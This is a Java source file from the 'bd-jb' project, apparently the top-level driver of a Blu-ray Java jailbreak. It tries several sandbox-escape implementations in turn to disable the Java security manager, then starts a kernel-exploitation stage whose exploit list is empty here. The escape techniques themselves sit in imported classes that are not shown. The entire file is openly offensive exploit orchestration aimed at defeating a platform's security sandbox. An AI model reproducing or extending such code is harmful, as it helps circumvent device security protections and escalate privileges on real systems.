bd-jb/src/com/bdjb/Exploit.java

/*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */

package com.bdjb;

import com.bdjb.exploit.kernel.ExploitKernelInterface;
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;

class Exploit implements Runnable {
  static void init() {
    Screen.println("[+] bd-jb by theflow");

    Screen.println("[*] Escaping Java Sandbox...");

    Class[] sandboxExploits =
        new Class[] {
          ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
        };

    for (int i = 0; i < sandboxExploits.length; i++) {
      try {
        ExploitSandboxInterface exploit =
            (ExploitSandboxInterface) sandboxExploits[i].newInstance();
        if (exploit.trigger()) {
          break;
        }
      } catch (Exception e) {
        continue;
      }
    }

    if (System.getSecurityManager() != null) {
      Screen.println("[-] Error could not disable security manager.");
    }
  }

  static void start() {
    new Thread(new Exploit()).start();
  }

  public void run() {
    if (System.getSecurityManager() != null) {
      return;
    }

    Screen.println("[*] Exploiting kernel...");

    Class[] kernelExploits = new Class[] {};

    for (int i = 0; i < kernelExploits.length; i++) {
      try {
        ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
        if (exploit.trigger()) {
          break;
        }
      } catch (Exception e) {
        continue;
      }
    }
  }
}